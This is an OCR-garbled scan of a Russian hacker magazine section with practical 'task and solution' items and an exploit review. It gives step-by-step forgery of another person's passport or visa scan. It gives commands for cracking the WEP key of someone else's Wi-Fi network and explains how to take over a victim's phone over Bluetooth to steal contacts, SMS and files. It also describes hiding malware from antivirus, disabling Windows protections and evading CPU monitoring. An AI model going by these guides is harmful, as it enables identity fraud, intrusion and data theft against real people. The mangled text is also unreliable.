ѴѴІЫ00ѴѴ8\с5Г5с.ехе (в автозагрузке у нас как служба прописан ѴѴІ N 00ѴѴ5\ 
5ув1;епп32\с5Г5с.ехе), запускаем его (второй файл), завершая наш фейковый 
сервис. В итоге имеем в процессах нашу прогу свгзс.ехе, запущенную от 
имени пользователя 5У5ТЕМ. 



№2 



I АДАЧА: 



РЕШЕНИЕ: 

Не будем вдаваться в подробности, откуда у нас чужой паспорт/виза/пра- 
ва/еіс., а приступим к работе. Воспользуемся небезызвестной прогой АбоЬе 
РЬоІозЬор любой версии. Подделать скан можно разными путями, я опишу 



наиболее простой и нетребующий особыхзнаний или умений в работе с 
фотошопом. 

1. Делаем резервную копию и перетаскиваем скан в фотошоп (либо Файл -> 
Открыть). 

2 . Допустим, необходимо поменять имеющиеся имя и фамилию на желае- 
мые данные «Ѵазіа ѴазесЬкіп» в иностранной визе/паспорте. Выбираем 
из имеющегося в сканетекста нужные нам символы. Данные заполняются 
шрифтом одного стиля, поэтому можно набирать со скана любые буквы. 
Жмем «2», увеличивая масштаб до максимума. Выбираем инструмент 
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Лассо (клавиша «І_») и попиксельно обводим букву. Здесь надо обратить 
внимание на то, что текст не может быть идеален, поэтому внимательно 
обводим пиксели, отличающиеся отфона. Выделение считается закончен- 
ным, когда совмещены начало и конец. 

3. Копируем выделенное на новый слой. Выбираем Слой Новый 
«Скопировать на новый слой» (СМ+Д Тоже самое делаем с каждой буквой 
по очереди, пока не наберем все необходимые для составления нужных 
имени и фамилии символы. 

Каждая буква должна располагаться на отдельном слое, которые пере- 
числены на панельке справа внизу. После каждого копирования щелкаем 
по значку глаза слева от имени слоя (либо Слой -> Спрятать_слой, — он 
становится невидимым) и переходим на основной слой со сканом, кликая 
по нему мышью. 

4. Затираем старые данные. Оттого, насколько хорошо вырезаны буквы и 
затерт старый текст, зависит качество нашей работы. Поэтому не ленимся, 
копируем пикселы, окружающие буквы на скане, и вставляем их на сами 
буквы. Жмем «М» (инструмент«Прямоугольная область»), обводим пиксел 
фона, жмем <СМ+С>, обводим пиксел на букве, жмем < СЫ+Ѵ>. Стараемся 
сохранить переход цвета из одного тона в другой, контуры водяныхзнаков, 
различные полосы. 

5. Выстраиваем имеющиеся буквы на подготовленном в предыдущем шаге 
месте. Щелкаем по слою с очередным символом, делаем его видимым 
(Слой ->Показать_слой), выбираем инструмент«Перемещение» (клавиша 
«V») и перетаскиваем изображение буквы на нужное место. 

6. Проверяем получившийся результат. Если все устраивает, соединя- 
ем слои через Слой -> Объединить_видимые (5ЫЙ+СМ+Е) и сохраняем 




-Л1іГЛ.Т^ ВЗЛОМАТЬ ^ЕР-КЛЮЧ от интересующем 
ѴѴІ-РІ СЕТИ. 

РЕШЕНИЕ: 



Вардрайвинг ака взлом ѴѴі-Рі сетей с каждым днем становится все 
более актуальным. Это и неудивительно, ведь беспроводные сети 
получили широкое распространение натерритории нашей необъятной 
Родины. Нуда ладно, отлирики к делу. Какты знаешь, многие сети 
используют ѴѴЕР-шифрование, поэтому для реализации задуманного 
нам потребуется: 



1 . Ьіпих 

2. Мі-Рі карточка АДЬегоз или Ргізш (желательно) 
3 . Прямые руки и трезвая голова : ) 



Также необходимо запастись следующим софтом (под Линух): 

1. Кізтеб (мощный сканер Иі-Рі сетей) 

2. Аігосіитр (утилы для сбора ІѴз) 

3 . Аігсгаск (тулза для взлома МЕР-ключей) 

После того, какты заинсталишь вышеуказанные утилы, можешь смело 
двигать в поисках ѴѴі-Рі -точек. Как только ты обнаружишь наличие 
ѴѴЕР-шифрования, дальнейшие действия будут выглядеть следующим 
образом: 

1 . Запускаем Аігосіитр: 

аігосіитр ѴѴі-Рі -саг* сіитр СНАМЫЕІ_ 1 

— где ѴѴі-Рі-сагІ — имя твоей ѴѴі-Рі- карточки, а СНАМЫЕІ_ — канал 
точки доступа. Тулза перехватит и сохранит ІѴз (Іпіііаіігаііоп Ѵесіогз) в 
файл с расширение .іѵз. 

2. Теперь запускаем утилу Аігсгаск, причем сделать это можно даже в 
момент работы Аігосіитр: 

аігсгаск -а 1 -Ь МАО сіитр.іѵз 




изображение в нужном формате иРЕб, ВМР ит.п.), выбрав меню Файл -> 
Сохранить_как (5ЫЙ+СМ+8). 

Качество получившегося скана напрямую зависит от количества 
потраченного времени и прямоты твоих рук. Удачи начинающим 
художникам! 



— где МАО — МАС-адрес точки доступа, а сіитр.іѵз — файл, в который 
Аігосіитр собирает ІѴз. 

З.Ждем. Время взлома ключа напрямую зависит от количество собран- 
ных ІѴз. 

Весь указанный софт давно существует и для ѴѴіп-платформы, но все 
же я советую юзать тебе І_іпих. Существует даже специальный 1_іѵе 
Сй для вардрайверов на базе 5І_АХ — Васкігаск І_іпих, включающий 
в себя сканеры, анализаторы сетей и прочие полезные тулзы. Кстати, 
ты запросто можешь установить данный дистр себе на винт и юзать в 
качестве штатной ОС. Но тут, как говорится, каждому свое. 

Кроме того, советую позаботиться о собственной безопасности и кон- 
спирации. В общем, удачного вардрайвинга. 



Инсталим ѴѴі-Рі-софт 
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АДАЧА 



3 ПОЛУЧИТЬ ДОСТУП К ЧУЖОМУ МОБИЛЬНИКУ ПОСРЕДС- 
ТВОМ ВЮЕТООТН-СОЕДИНЕНИЯ. 

РЕШЕНИЕ: 



Ты, наверное, слышал отаком виде хакинга, как ЫиеЬаскіпд, то есть хакинге 
посредством блютус-соединения.Тем не менее, информации поданному 
типу атакдовольно мало, посему начнем по порядку. Прежде всего, нам пот- 
ребуется КПКлибо смартфон с ѴѴІпсіоѵѵб МоЬіІе, атакжетулза под скромным 
названием «Терминал». Смело и н сталь ути луна свой девайс и запускай 
блютус. Единственный минус — тулза работаеттолько после осуществления 
авторизации и установления соединения с другим устройством, нотутуж 
применяй собственные навыки Си :). Послетого, какжертва авторизирует 
тебя, запускай «Терминал» и выбирай необходимый режим работы: 




1 . Режим ОВЕХ РТР позволяет получить доступ к файло- 
вой системе мобильника жертвы. Ты сможешь сливать/от- 
правлять/удалять/создавать файлы . Однако, реализация 
ОВЕХ отличается в каждом телефоне, поэтому не все 
заявленные возможности будут работать. 

2 . Режим АТ позволяет отсылать команды мобильнику 
жертвы. Данный режим предоставляет практически без- 
граничные возможности для управления чужим телефо- 
ном. Все, что от тебя требуется — найти доки по АТ 
командам. Также в режиме АТ есть возможность получить 
телефонную книгу и смс жертвы. 

3 . Режим ІгМС позволяет получить доступ к телефон- 
ной книге и календарю чужого мобильника через сервис 
синхронизации. Все полученные данные сохраняются в 
формате ѴСАКБ ( .ѵсб) . 

4 . Режим отправки файлов позволяет отправить сра- 
зу несколько файлов на чужой мобильник . Отправка 
происходит таким же образом, как если бы отправляли 
через файл-менеджер. Причем, скорость отправки через 
«Терминал» может превышать скорость отправки через 
файл-менеджеры в несколько раз . 

5 . Режим отправки сообщений позволяет отправлять тек- 
стовые сообщения на выбранный телефон. 

6 . Режим получения файлов представляет собой сервер 
ОЪех ОЪ^есб РизЬ. Ты сможешь сливать чужое файло себе 
на флэшку : ) . 



Какты видишь, тулза обладаетогромным потенциалом. Важно лишь 
грамотно им распорядиться. Кстати, софтинку мы заботливо выложили на 
наш 0Ѵ0. 




АДАЧА 



^ОСТАНОВИТЬ ВЫПОЛНЕНИЕ ПРОГРАММЫ ПРИ ОП- 
РЕДЕЛЕННОМ УСЛОВИИ. 

РЕШЕНИЕ: 



Такая задача возникает в процессе отладки практически любой про- 
граммы. Например, часто требуется отследить, когда в ячейке памяти 
появится некоторое значение или же остановить выполнение програм- 
мы, когда содержимое регистра находится в определенном числовом 
диапазоне. Здесь стоит сказать пару слов об условных точках останова 
и о таком понятии, как трассировка. Трассировка — это пошаговое вы- 
полнение программы с остановкой на каждой команде и «фиксировани 
ем» состояния регистров процессора и ячеек памяти. Если мы задали 
какое-либо условие, отладчик автоматически выполняет программу до 
тех пор, пока оно не выполнится, делая «сверку» на каждой инструкции 
Небольшой пример: попробуем при помощи ОИуйЬд поставить услов- 
ную точку останова. Прикажем отладчику остановить трассировку про- 
граммы, когда значение регистра ЕАХ будет равно 1 ,2 или 3. Для этого 
необходимо использовать логические операторы: оператор равенства 
(«==») и оператор «или» («II»). Выражение для нашего случая будет 
выглядеть так: (ЕАХ==1 )||(ЕАХ==02)| |(ЕАХ==03). 

Вот действия, которые необходимо выполнить для установки условной 
точки останова: 



1. Загружаем программу под отладчиком ОІІуБЪд; 

2. Выбираем из меню «БеЬид» пункт «Зеб сопбібіоп»; 

3 . В открывшемся окне выставляем галочку напротив 
надписи «Сопсіііііоп із ТЕБЕ» (этим мы указываем отлад- 
чику, что при трассировке будет учитываться условие 



— логическое выражение, введенное нами) ; 

4. Вводим наше условное выражение «(ЕАХ= = 1) | | (ЕАХ= = 0 
2)|| (ЕАХ==03)» в поле напротив надписи «СопбіДіоп із 
ТЕБЕ» . 

5 . Нажимаем «ОК» и начинаем процесс трассировки по 
нажатию <Сбг1-Р12> или по выбору пункта меню "БеЬид -> 
Тгасе оѵег» . 

Теперь выполнение программы остановится каждый раз, кактолько 
наше условие будет выполнено. В том, что это действительно так, ты 
можешь убедиться на примере, проследив за значением регистра ЕАХ в 
окне «Ведізіегз». 

Совет: раздел «Еѵаіиабоп оі ехргеззіопз» стандартной справки ОНуОЬд 
содержит много полезной информации о логических выражениях. 
Винде, установленной на ѴМѵѵаге. 
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|ПОЛУЧИТЫР-АДРЕС СЕРВЕРА, ОТКУДА ЗАГРУЖАЕТСЯ ТРОЯН ПРИ ПОМОЩИ ЛОАДЕРА. 



АДАЧА 



РЕШЕНИЕ: 

Рассмотрим нашу задачу на примере трояна, определяемого РгѴѴеЬ-ом 
какТгоіап.ОоѵѵпІ_оасІег.201 68 (создан ребятами из МабТеат). 

1 . Запускаем РЕісІ и определяем тип пакера, которым запакован троян (а, 
как правило, это так); 

2. Ищем при помощи доодіе.ги а н пакер и распаковываем лоадер. Вни- 
мание! Многие а н пакеры запуска ют запакованный файл на исполнение, 
так что лучше проводить операцию распаковки на ѵтѵѵаге или другой 
виртуальной машине с отключенными антивирусами; 

3. Открываем файл при помощи шестнадцатеричного редактора, напри- 
мер, ѴѴіпНех, и ищем нечто похожее на интернет-адрес. Я советую искать 
при помощи ѴѴіпНех, так какой обладает возможностью поиска по маске. 
Например, поиск по маске «Шр://?» с указанием в параметрах поиска 
«использовать знак вопроса в качестве подстановочного символа» 

(«ІІзе іЬіз аз а ѵѵіісісагсі») дает отличные результаты. Лоадер зачастую 
можетбыть встроен в довольно объемный файл, и ручной поиск в этом 
случае может дать массуложных срабатываний. Также можно попробо- 
вать произвести поиск по маске «??.??.??.??» (на случай, вдруг в лоадере 
содержится ІР-адрес). 

4. Если адрес найден, то задача успешно выполнена. Если же «опера- 
ция» провалена, и адрес никак не отыскивается, придется перейти к 
тяжелой «артиллерии». Воспользуемся отладчиком ОНуйбд. На всякий 
случай, перед запуском лоадера под отладчиком создай его копию, так 
как он зачастую самоуничтожается после загрузки. Итак, загружай иссле- 
дуемую программу в ОНуОЬд, но ни в коем случае не жми на «Е9» или на 
«Пип», иначе окажешься затрояненным. Дальше путь исследования раз- 
дваивается — либо все окажется предельно просто, либо чуть сложнее. 
5а. Первый вариант. Ставь точку останова на все функции, которые со- 
здают соединение с сервером. Мы поставим точку останова на функцию 
ІпІегпеЮрепЕІгІА. Как правило, все тривиальные лоадеры используют 
ее (описание функции ищи на нашем 0Ѵ0). 



Код внедренного потока в процессе зѵсЬозіехе 
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Нас интересует второй параметр функции — ЕрзіІМ, так как он и будет 
содержать ссылку. Смело жми < ДЬТ- Р 1 > и в открывшемся окошке пиши 
«Ьрх ІпІегпеЮрепІМА» (без кавычек). Точку останова установили, 
запускаем программу и смотрим в окошке стека параметры функции. 
Обычно этот путь срабатывает, но, как мы и договаривались выше, мы 
рассмотрим более сложный вариант — на примере лоадера Тгоіап. 
ОоѵѵпЕоасІег.201 68. 

5б. Вариант второй — ни на какой АРІ -функции, создающей соединение 
с сайтом, мы не остановились. Попробуем покопать чуть глубже. При 
прокрутке дампа лоадера Тго]ап. йоѵѵпЕоасІег.201 68 чуть ниже точки вхо- 
да мы видим такой набор АРІ-функций (если представить его упрощенно 
и опустить лишние подробности): 

■а. функцию ІзЕгсаЕ, которая склеивает строку «зѵсЬозСехе» с именем 
файла лоадера (включая путь к нему); 

б. функцию СгеаІеРгосеззА, которая создает процесс зѵсЬозІ: от имени 
пользователя с именем файла-лоадера в качестве параметра; 

в. функцию ѴѴгЬеРгосеззМетогу, которая пишет исполнимый код в па- 
мять созданного процесса «зѵсЬозІ.ехе», увеличивая его на 360006 байт; 

г. функции 6еі/5е1:ТЬгеасІСоп{ехІ, которые изменяют контекст созданного 
процесса таким образом, чтобы внутри него выполнялся поток лоадера; 

д. функцию РезитеТЬгеасІ, которая запускает созданный поток лоадера. 
Здесь необходимо краткое пояснение. Внутри одного процесса может 
выполняться несколько потоков (их также именуют как «нити» (іЬгеасІз)), 
причем каждому из потоков соответствует свой «контекст», то есть 
состояние регистров и стека. 

Вышеприведенная конструкция АРІ-функций дает полное представле- 
ние о работе файла лоадера. Он создает поток, который маскируется в 
файле зѵсЬозСехе. Хорошая маскировка :). 

в. Ставьточку останова на функцию РезитеТЬгеасІ, которая находится 
по адресу 004013876 и запускай процесс по Р9. После остановки процес- 
са на брекпойнте открой диспетчер задач (СТРЕ+АЕТ+ОЕЕ) и отсортируй 
список процессов по имени пользователя. Какты видишь, одна копия 
зѵсЬозТехе исполняется не от имени системы или локальных/сетевых 

сервисов, а от имени пользователя! 

Это и демаскирует процесс, указывая 
на то, что он создан лоадером. Щелкай 
по нему правой кнопкой и выбирай 
«отладка» (ОНуОЬд должен быть 
установлен в качестве ~ІизЫп-Тіте 
отладчика, это делается при помощи 
пункта меню «Орбопэ -> -ІизЫп-Тігпе 
беЬиддіпд»). Откроется второе окно 
отладчика. Самое время посмотреть 
на потоки отлаживаемого процесса 
зѵсЬозСехе. 

Жми на кнопку с буквой «Т» на панели 
инструментов отладчика. Данный 
процесс имеет2 потока, один из них 
со статусом «ЗизрепсІесІ», а другой 
— «АсЬѵе». Какты уже догадался, 
первый поток внедрен лоадером, его и 
выбираем. 

Прокрути дамп чуть ниже и по адресу 
00401081 располагается... адрес сайта! 
Что мы и хотели получить. 

Одним выстрелом мы убили двух 
зайцев: научились искать адрес внутри 
троян-лоадера и разобрались в попу- 
лярном механизме создания скрытно 
выполняемого кода! т 




•і Р И- И** Пн* 

г іЦрф фі *іЧ'-ти 

■ -н- іт 

р «Ь Р4**і*«> 



I п- щщ 



^ 1 “ ч- «ж 



№.штяітг ші* 

«Я! ІГ-Е И. -ЯН РШ 

■чети » *ави #.лг 
ік н_гч: 

» .1 а я с я і_ 4 

я- я и я Сп ■ я- 1 л + 
Ртл м и і 



ХАКЕР 03 /111/ 08 



► 045 




взлом 




с 

КРИС КАСПЕРСКИ 


ОБЗОР ЭКСПЛОЙТОВ 



ПАРАД ДЫР В N1 ПРОДОЛЖАЕТСЯ! КАКИ В ПРОШЛОМ ВЫПУСКЕ, Я ДЕЛЮСЬ СВОИМИ НАХОДКАМИ, ВПРО- 
ЧЕМ, НЕ ПРЕТЕНДУЯ НАТО, ЧТО ПЕРВЫМ ИХ НАШЕЛ ИМЕННО Я. ВО ВСЯКОМ СЛУЧАЕ, ИХ ЯВНОГО ОПИСАНИЯ 
В СЕТИ НЕ НАШЛОСЬ, ДА И ТАК ЛИ ВАЖНО, КТО ПЕРВЫЙ СКАЗАЛ «ГАВ»? ГЛАВНОЕ, ЧТО ЭТО РЕАЛЬНЫЕ 
ДЫРЫ, РАБОТАЮЩИЕ НА ВСЕХ СОВРЕМЕННЫХ ОПЕРАЦИОННЫХ СИСТЕМАХ МІСР050РТ — ОТ ѴѴ2К ПО ВИСТУ 
ВКЛЮЧИТЕЛЬНО. ДА БУДЕТ СВЕТ! ТУШИТЕ СВЕЧИ! 



МІСВ050РТ 

ѴѴІМ00ѴѴ5: 

РЕ ! ОАО Г В В ВО О 



>> Вгіе? 



| Еще весной 2004 года я 
обнаружил гремучую уязвимость в 
загрузчике РЕ-файлов, роняющую 
ѴѴ2К5РЗ в В5СЮ с прикладного 
режима даже без прав админист- 
ратора. И хотя дыра была описана 
в «Системном администраторе», 
русском издании «Компьютерных 
вирусов снаружи и изнутри», а 
также в «Збеіісосіег’з ргодгаттіпд 
ипсоѵегесі», выпущенной на англий- 
ском языке — уязвимость никуда 
не делась. Разработчики ХР 5Р2 
исправили большое количество дыр 
в РЕ-загрузчике, но эту пропустили. 



пространство, не требуя от него 
ни цифровой подписи, ни прав 
администратора. Позволю себе 
процитировать отрывок из своей 
собственной статьи четырехлетней 
давности: «поля Рііе Аіідптепі и 
Зесііоп Аіідптепі задают кратность 
выравнивания секций на диске и в 
памяти, соответственно. Официаль- 
но о кратности выравнивая извест- 
но лишьто, что она представляет 
собой степень двойки, причем: 

а) Зесбіоп Аіідптепі: 
должно быть больше или 
равно ЮООЬ байт; 

б) Рііе Аіідптепі: должно 
быть больше или равно 

2 00Л. байт; 

в) Зесбіоп Аіідптепі: 




Спецификация РЕ-файла от Місгобоіі 



загружен. ВѴѴіпсІоѵѵз ЫТ существует 
недокументированная возмож- 
ность отключения выравнивания, 
основанная натом, что загрузку при- 
кладных исполняемых файлов/ди- 
намическихбиблиотеки системных 
драйверов обрабатывает один и тот 
же загрузчик. Если Зесііоп Аіідптепі: 
== Рііе Аіідптепі, то последнее поле 
может принимать любое значение, 
представляющее собой степень 
двойки и превышающее 106. Усло- 
вимся называть та кие файлы «не 
выровненными». Хотя этоттермин 
не вполне корректен, лучшего пока 
не придумали. Кне выровненным 
файлам предъявляется следующее, 
достаточно жесткое требование 
— виртуальные и физические адреса 
всех секций обязаны совпадать, 
то есть страничный имидж должен 
полностью соответствовать своему 
дисковому образу. Впрочем, никакое 
правило не обходится без исключе- 
ний, и виртуальный размер секций 
может быть меньше их физического 
размера, но не более чем Зесііоп 
Аіідптепі — 1 байт(секция все равно 
будет выровнена в памяти). Самое 
интересное, что физический размер 
последней секции «вылетает» за 
пределы загружаемого файла, а 
операционная система выбрасывает 
голубой экран смерти». 



»ТагдеІ5| 



ЫТ, ѴѴ2К, ХР, Зегѵег 2003, Зегѵег 
2008, Виста. 



» Ехріоігі 



Демонстрационный ехріоіі выло- 
жен на моем сервере по адресу 
ЬіІрѴ/пегиті.ога.ги/зоигіг/баск/ 
РЕ ВЗОР . 



>>5оІиІіоп 



Отсутствует. 



МІСР050РТ 

ѴІ5ТА: 

и «ев ОТКЛЮ- 
ЧЕНИЕ йЕР, А5ЬР, 
5АРЕ5ЕН, ЕТС 



>> Вгіе? 



| Начинаяс ХР, парни из 
Місгобоіі всерьез озаботились 
безопасностью, и уже в ХР 5Р2 
появился ОЕР (поддержка ЫХ/Хй 
битов страниц, препятствующих 
выполнению кода на куче и в стеке) 
и механизм ЗаІеЗЕН, ну а Виста 
явила нам рандомизацию адрес- 
ного пространства, она же АЗбР. 
Хакерам сразу стало интересно, 
как отключить все эти хорошие 
вещи, затрудняющие атаки. Воз- 
ник вопрос: какже в Висте ухитря- 
ются работать старые программы, 
использующие антиотладочные 
трюки, противоречащие политике 
защитных механизмов. Всем из- 
вестна плохая совместимость Вис- 
ты с программным обеспечением, 
написанным до нее — однако, для 
популярных защитных пакетов 
(АЗРаск, 51а гі Рогсе) в ІЧТОЕЕ.ОЕЕ 



Не заметили ее и разработчики 
Висты, а я к настоящему времени 
уже вплотную подошел к созданию 
боевого ехріоіі’а, позволяющего 
загружать вбеіі-код в ядерное 



должно быть больше или 
равно Рііе Аіідптепі: . 

Если хотя бы одно из этихусловий 
не соблюдается, файл не будет 




Лазейка для некоторых популярных защит, оставленная в файле КНОбЕ. 
ОН от Висты 
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была оставлена специальная 
«нычка», распознающая запро- 
текченные файлы и молчаливо 
отключающая защитные меха- 
низмы Висты, препятствующие их 
функционированию. Опознание 
происходит по именам секций РЕ- 
файла, и, если это '.апогее', ’.рсіе' 
или '.азраск', файл автоматически 
получает «иммунитет». Сброс поля 
СОРР-за головка «сбагасіегізбсз» 
в 01 ОЕЬ (21 0Е для динамичес- 
ких библиотек) также отключает 
множество защит (даже тех, что 
еще не появились на свет), причем 
5РС (система автоматической 
проверки целостности системных 
файлов) не контролирует поле 
«сбагасІегів1:ісв» и потому отклю- 
чение защиты можно осущест- 
влять даже для системных файлов: 
ехе, сШ, осх. Естественно, удаленно 
этого не сделать и для реализации 
атаки необходимо найти дыру в 
каком-нибудь приложении, но ак- 
туальности угрозы это не снижает. 



>>Тагдеі5:| 



ХР, 5егѵег2003, 5егѵег2008, Виста 



» Ехріоігі 



Не требуется. 



>>5оІи*іоп 



Отсутствует. 



МІСК050РТ 

ѴѴШйОѴѴВ: 

ЕР5 НА СТРАЖЕ 
МАЛ ВАРИ 



>> Вгіе? 



I РІачиная с\/Ѵ2К, в ѴѴіпбоѵѵв 

появилась поддержка шифрован- 
ной файловой системы (Епсгурбпд 
Рііе Эузіет или ЕР5), реализован- 
ной в виде расширения к ЫТР5 и 
архитектурно находящейся на один 
уровень ниже ее, в результате чего 
все операции с зашифрованными 
файлами протекают абсолютно 
прозрачно какдля пользователя, 
так и для прикладных приложе- 
ний. Удобно! Ріо что скрывается 
за этим уродством, тьфу, прости- 
те, оговорился, удобством? Для 
каждого пользователя произволь- 
ным образом генерируется пара 
асимметричных ключей: публичный 
ключ (доступный всем) и приват- 
ный ключ, который потеории не 
должен быть доступен никому, 
кроме юзера. Публичный ключ 
копируется в каталог\сіоситепІ5- 
п-5еиіпд5\и5ег-пате\аррІісаІіоп 
сіа*а\тісго5ои\зу5ІетсегШісаІе5\ 
изег-патеѴсегІіЯсаІезѴ а приват- 
ный помещается в\сІоситепІ5-п- 
5еиіпд5\и5ег-пате\аррІісаІіоп 
сіаІа\тісго5ои\сгурІо\г5а\. 

Однако, поскольку асимметричная 



криптография —тормозная штука, 
МісгозоЙ придумала шифровать 
файлы симметричным ключом 
пользователя (Рііе Епсгурбоп Кеу 
или РЕК), также генерируемым про- 
извольным образом. Содержимое 
файла шифруется РЕК-ключом по 
алгоритму 0Е5Х (ѴѴ2К) или АЕ5 (ХР и 
выше), а сам РЕК-ключ шифруется 
публичным ключом и взашифро- 
ванном виде сохраняется в файле в 
отдельном именованном ЫТРЭ-по- 
токе $ЕР5. Специальный компонент 
системы, называемый агентом вос- 
становления, считывает приватный 
ключ пользователя, извлекает из 
$ЕР5 потока зашифрованный РЕК- 
ключ, расшифровываете™, после 
чего расшифровываетРЕК-ключом 
содержимое самого зашифрован- 
ного файла. Достоинство ѴѴ2К в том, 
что в ней имеется агент восстанов- 
ления поумолчанию, представлен- 
ный в лице администратора сис- 
темы, в хранилище сертификатов 
которого автоматически копируют- 
ся все приватные пользовательские 
ключи, а потому администратор 
может расшифровать файл, зашиф- 
рованный любым пользователем, 
даже если тотугробитсвою учетную 
запись. РІачиная сХР, агент вос- 
становления поумолчаниюушел 
в отставку и, хотя администратор 
по-прежнему может расшифровать 
файлы, зашифрованные пользова- 
телями, ему необходимо вручную 
скопировать их приватные ключи в 
свое хранилище сертификатов. Это 
была предыстория. Атеперь — уяз- 
вимость! Поскольку антивирусное 
программное обеспечение, как пра- 
вило, работаете правами админис- 
тратора (или из-под учетной записи 
спец пользователя), чтобы видеть 
все файлы, то зловредному ПО ни- 
чего не стоит скрыться от его глаз. 
Достаточно просто присвоить своим 
файлам атрибут «епсгурЕесІ» и все! 

А сертификат, кстати говоря, можно 
динамически удалять/добавлять из 
хранилища, используя его только на 
время активной фазы работы — это 
предотвратите™ ручное копиро- 
вание администратором. Правда, 
если жертва сидит под «админом», 
то... хм, ну и это не преграда, ведь 
малварь может создать для себя 
отдельного пользователя, запуская 
файлы через гипаз, и антивирус 
их никак не захавает. Конечно, 



существование самихфайлов не 
скрыть и при попытке доступа к ним 
антивирус получит ошибку отказа в 
доступе, но... это все-таки не то же 
самое, что антивирусная тревога! 



>>ТагдеІ5| 



ХР, 5егѵег2003, 5егѵег2008, Виста 



» Ехріоігі 



Не требуется. 



>>5оІиІіоп 



Отсутствует. 



лательныхтормозов. Большин- 
ство коммерческих провайдеров 
накладывают жесткие ограничения 
на предельное время исполнения 
скрипта, зачастую приостанавливая 
хостингпри его превышении, а 
некоторые вычислительные центры 
напрямую торгуют машинным 
временем (они бы еще и воздухом 
торговали, блин). Спрос рождает 
предложение, и возникает естест- 
венная потребность — заплатить по- 
меньше, а получить побольше, дру- 
гими словами, украсть машинное 
время. Это актуально не только для 
суперкомпьютеров, но и обычных 
серверов, поскольку, большинство 
малвари палится как раз потому, что 
неумеетправильно воровать. 

Все операционные системы 
линейки ЫТ (как сервера, так и 
рабочие станции) поддерживают 
развитую систему мониторинга 
счетчиков производительности, 
отображая в реальном времени 
загрузку ЦП и выводя полное 
время, проведенное каждым 
процессом в пользовательском 
режиме и в режиме ядра. Уви- 
деть его можно как с помощью 
«Системного монитора», так и 
«Диспетчера Задач». Разницы 
между ними никакой, так ка кони 
считают показания одних и тех 
же счетчиков. Утилиты сторонних 

► 047 



ЧЕСТНАЯ 
КРАЖА 
ПРОЦЕССОР- 
НОГО ВРЕМЕНИ 

В многозадачных (и особенно 
многопользовательских) системах 
очень важно знать, сколько процес- 
сорного времени «скушала»та или 
иная задача, чтобы планировать 
загрузку ЦП, не допуская неже- 
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При отдаче остатков квантов загрузка ЦП замет-| 
|но снижается (з1:еаІ == 30000) 



разработчиков (например, «Ргосезз Ехріогег» Марка Руссиновича) 
также выводят данную информацию, причем в более наглядной фор- 
ме. И ведь многие ей верят. 

Лишь немногие задумываются, насколько точны эти показания, и можно 
ли их подделать, а если можно, то как? Достопочтенный «Червь Морриса» 
периодически расщеплял себя надвое, уничто- 
жая материнский процесс. Счетчикпотребления 
процессорного времени дочернего процесса при 
этом, естественно, устанавливался в ноль, что 
позволило Моррису избежать«накопления» вре- 
мени ЦП. Однако подобная активность слишком 
заметна, что не есть гуд. 

Разумеется, это грубая схема. Существуют 
намного более изощренные способы хищения 
процессорного времени, впервые проде- 
монстрированные и теоретически обоснован- 
ные известным экспертом по безопасности 
Тзійоти ЗЫтотига (тем самым, который 
ловил Митника) в далеком 1 980 году. Тогда на 
них не обратили никакого внимания. Л ишь в 
2007 году (двадцать семь лет спустя!) два сту- 
дента Израильского университета «Зсбооі о! 

Сотрійег Зсіепсе апсі Епдіпеегіпд ТЬе НеЬгеѵѵ 
Ііпіѵегзііу» Уоаѵ Еівіоп и йгог 6. Реііеізоп в соавторстве с Оап’ом Тзаітіг 
— сотрудником корпорации ІВМ — опубликовали статью «ЕесгеЛу 
Мопороіігіпд іЬе СРО ѴѴііЬоиІ Зирегизег Ргіѵі Іедез», показывающую, что 
за минувшие годы ничего не изменилось и кража процессорного време- 
ни по-прежнему остается возможной во всех операционных системах: 
Ыпих, ВЗй, ЫТ, еіс. 

К тем же самым выводам (приблизительно в то же самое время) 
пришел и я, исследующий устройство счетчиков производительности 
и алгоритм определения загрузки ЦП/процессорного времени в ѴѴ2К, 
Зегѵег 2003 и Висте. Выяснилось, что система измеряет не загрузку 
ЦП кактаковую, а готовность системного планировщика предоста- 
вить процессорное время потоку по первому требованию. Это очень 
грубый показатель, а методы его измерения вообще таковы, что 
вызывают шевеление волос в разных местах. Если представить все в 
упрощенном виде, то происходит это так. Имеется рабочий (который 
работает или, что тоже возможно, не работает) и специальный «инс- 
пектор», который через регулярные промежутки времени (например, 
каждый час) приходит и проверяет, чем рабочий в данный момент 
занимается. Если тот вкалывает, как пара Карло, то ему ставится «за- 



чот» за весь отчетный период и, соответственно, наоборот. 

Вообразим вполне вероятную ситуацию, при которой рабочий устра- 
ивает себе пятиминутный перекур каждый час. Как нетрудно рас- 
считать, его «загрузка» составит -90%, но если перекуры совпадут с 
приходом инспектора, мы получим нулевую загрузку! Шутки в сторону, 
господа! При желании можно написать про- 
грамму, потребляющую свыше 90% времени 
ЦП, но «Диспетчер Задач» (а вместе с ним и 
«Системный Монитор») будут осциллировать 
в переделах абсолютного нуля. Для этого 
достаточно отдавать остаток кванта времени 
за несколько миллисекунд до его истече- 
ния. Планировщик, обнаружив, что поток не 
исполняется, ошибочно пропишет ему «ноль» 
в графе «Использование процессорного 
времени». 

Длительность одного кванта в ЫТ-подобных 
системах составляет порядка 1 00 мс. Отдать 
остаток неиспользуемого кванта можно при по- 
мощи АРІ-функции 51еер(0), которая соответс- 
твует функции папозІеерО в ІЛЧІХ-системах. 
Самое сложное — это синхронизовать отдачу 
остатка кванта с приходом «инспектора», 
тогда, даже отдавая ничтожный остаток кванта, мы снизим потребление 
процессорного времени до абсолютного нуля (а точнее, украдем все про- 
цессорное время). Поскольку алгоритмы планировки потоков меняются 
от одной версии системы к другой, написать переносимую программу 
довольно сложно, но, к счастью, и не нужно. Куда легче отдавать сущест- 
венный остаток кванта функцией Віеер ( 1 ), вгоняющей поток в сон на 1 мс 
(на самом деле, Юме, что связано с дискретностью системного таймера), 
гарантированно обеспечивая здоровый сон потока к моменту прихода 
инспектора. А поскольку при пробуждении поток получает полный квант, 
открывающий новый «отчетный период», это естественным образом 
синхронизует его с приходом «инспектора». КПД программы, конечно, 
упадет ( часть времени она будет спать вместо того, чтобы работать), но 
куда нам спешить? Напишем несложную тестовую утилиту и проведем с 
ней несколько познавательных экспериментов: 



СНЕАТЕК.С — ПРОГРАММА, ДЕМОНСТРИРУЮЩАЯ ЧЕСТНУЮ 
КРАЖУ ПРОЦЕССОРНОГО ВРЕМЕНИ 

// бобаі — общее количество вычислений некоторого типа 
(неважно каких) 



«Достопочтенный 
«Червь Морриса» 



периодически рас- 






уничтожая мате р и^ 
скии процесс, чтобы 
[избежать «накопле- 
ния» времени ЦП» 
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Транслируем программу компилятором «Місгозо^ Ѵізиаі С++»со 
